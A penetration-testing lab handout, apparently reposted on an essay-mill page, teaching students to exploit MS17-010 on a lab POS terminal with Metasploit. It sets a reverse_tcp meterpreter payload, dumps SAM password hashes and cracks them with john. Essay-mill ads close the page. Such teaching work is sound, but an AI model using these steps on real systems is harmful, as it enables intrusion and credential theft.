Week 7 Lab – Hacking a POS terminal
As you have learned an embedded system such as a point of sale terminal can suffer from many of the same vulnerabilities as a normal server or user workstation. As such, many of the techniques we are going to use to attempt to harvest credentials are the same as you would use on a regular workstation.
You have been given the IP address of the POS terminal you are to target so you won’t need to do a scan to locate where the host is on the network but we would still like to scan/enumerate/search for vulnerabilities. Refer back to your earlier labs to complete the next two actions. You must do this lab from your Kali VM.
Using Sparta scan/enumerate the POS terminal at the IP address you were given. Provide a screen shot showing the open ports. What else did you find of value in your scan?
Now use OpenVAS to check for vulnerabilities. Provide a screen shot showing the first page of the scan report for the POS terminal. This page should show the high severity vulnerabilities.
Through your vulnerability scans you learned the POS terminal has the vulnerability known as Microsoft Windows SMB Server Multiple Vulnerabilities. It is also known as MS17-010 and has CVEs 2017-0143, 144, 145, 146, 147 & 148. This is a major vulnerability. It carries a CVSS of 10 and could allow us a great deal of access to the host. The goal of this lab will be to harvest the credentials present on the pos terminal. We will do this by exploiting the MS17-010 vulnerability using a tool called Metasploit, extract the hashed credentials from the windows SAM file, and decrypt them using the tool john. Lots to do so let’s get started.
Now that you know your target ip and a potentially exploitable vulnerability we can move on to our next task which we will do through Metasploit. The Metasploit framework provides a common structure from which to launch various exploits and their associated payloads. In addition to launching exploits others have written you can write your own exploits and payloads. To start Metasploit use the ‘Applications’ menu, select the ‘Exploitation Tools’ menu, and select Metasploit. The first time you use Metasploit it will initialize its database which may take a few minutes. Once that is complete it will complete loading and present you with a random piece ACSII art. Your screen will differ from the below but your last line should be a msf> prompt.
Normally your next step would be to issue the command msfupdate to update the database and associated exploits. As the toxic pool is not connected to the internet you will skip this step. Metasploit was updated when the Kali vm was built.
Next we will see if Metasploit has an exploit for the MS17-010 vulnerability we found on our target host. Enter the following command:
We are rewarded with a list of the available exploits. In addition to the name of the exploit and a description of what it does you will see a ranking of potential of success. Metaploit ranks exploits from lowest to highest as: manual, low, average, normal, good, great, excellent. Keep in mind an exploit may not always be successful.
We will be using the second listed exploit. To load the exploit issue the use command with the name of the desired exploit.
Now that we have loaded the exploit we need to set the payload. Payloads can do any number of tasks such as open vnc sessions or launch a meterpreter shell on the target system. The meterpreter shell launches in the target’s memory so no record is left on the systems drives. The shell provides access to the host to do any number of additional activities. Our first step is to see what payloads are available with this exploit. To do that enter the following command:
You will see a pretty extensive list of potential payloads. We are interested in the one which will launch a reverse_tcp meterpreter shell. We’ve already talked about the shell but you will note many of the payloads have two sets of variations, one which says bind and one which says reverse_tcp. These are two different types of connections. With the meterpreter bind the payload is loaded on the target system and it waits for you to make a connection to it. With the meterpreter reverse_tcp variant the payload is delivered and the target starts a connection back to your system. The command to set the payload is:
set payload windows/x64/meterpreter/reverse_tcp
Each payload may have options which need to be set to specify how the payload will act. To see what options are available use the command show options
Options are shown as required or optional. This payload has two required options which have not yet been set, RHOST (remote host, the IP of your target) and LHOST (local host, your IP). Issue the following two commands, providing your specific target and Kali IP. Remember you determined your target’s IP at the beginning of the lab and you can find your IP by using the command ifconfig in a terminal window.
To make sure you have set LHOST and RHOST correctly use the command show options again.
Paste a screen dump of your options screen showing RHOST and LHOST set for your target and kali vm
We have now specified the exploit, the payload, and set the payload options. It’s now time to launch our attack. Issue the following command:
The command may take a while to execute. You can monitor its progress through the onscreen messages as it exploits the vulnerability we found earlier. Your hope is that the exploit will eventually be successful and you will be rewarded with a WIN and a shell prompt. You may need to attempt the exploit more than once.
There are many activities we could do from here but our goal is to dump the user credentials on this
system. Windows passwords are stored locally in the SAM file. Windows locks this file so that it cannot be accessed by any user while the system is running. One way to copy the file is get physical access to the computer and boot it to a live CD or external drive and then mount the system drive. The meterpreter shell allows us a way to do this remotely through the command hashdump. Issue that command at your meterpreter prompt
What you are provide with is a list of users and their hashed password. Yours will be different than the above. We need to copy this information and use the program john to try and crack the passwords. Highlight the user/hash information and copy it to your clipboard.
Once you have copied the information go to a new terminal window and create a new file with gedit.
Right click to paste the windows credentials, save, and close the file.
Once this file is closed you can return to your metasploit window and use the command quit twice, once to quit the meterpreter shell and once to quite metasploit.
John is a password cracker with several capabilities. You will use the default configuration which attempts to crack the passwords, first through a dictionary attack and then through a brute force effort. During some pentests you may choose to build your own dictionary based on words you related to the company (product names, users, mascots, etc) you find during your opensource collection. The default dictionary is based on common passwords.
You can attempt to crack the passwords in the target file with the following command:
john hashes.txt –format=nt
The option format=nt is telling john to try a ntlm hash for the crack.
As john runs it will return usernames and the associated passwords as it runs. This technique will not always be successful but it’s a good one to try.
Provide a screenshot of the usernames and passwords you found
EXTRA CREDIT (5pts)
Review the scans you did earlier with Sparta. Given those results and the credentials you now possess you have the information necessary to access the POS terminal. Once you have access look around and locate a flag placed somewhere on the system. The flag is an obvious file and it’s not buried deep.
You should not use metasploit as part of completing the extra credit portion of this assignment.
To earn the extra credit write a summary of how you gained access, where you found the flag, and the flag’s title and message.
Buy an essay in any subject you find difficult—we’ll have a specialist in it ready
Ask for help with your most urgent short tasks—we can complete them in 4 hours!
Get your paper revised for free if it doesn’t meet your instructions.
Contact us anytime if you need help with your essay
APA, MLA, Chicago—we can use any formatting style you need.
Get a paper that’s fully original and checked for plagiarism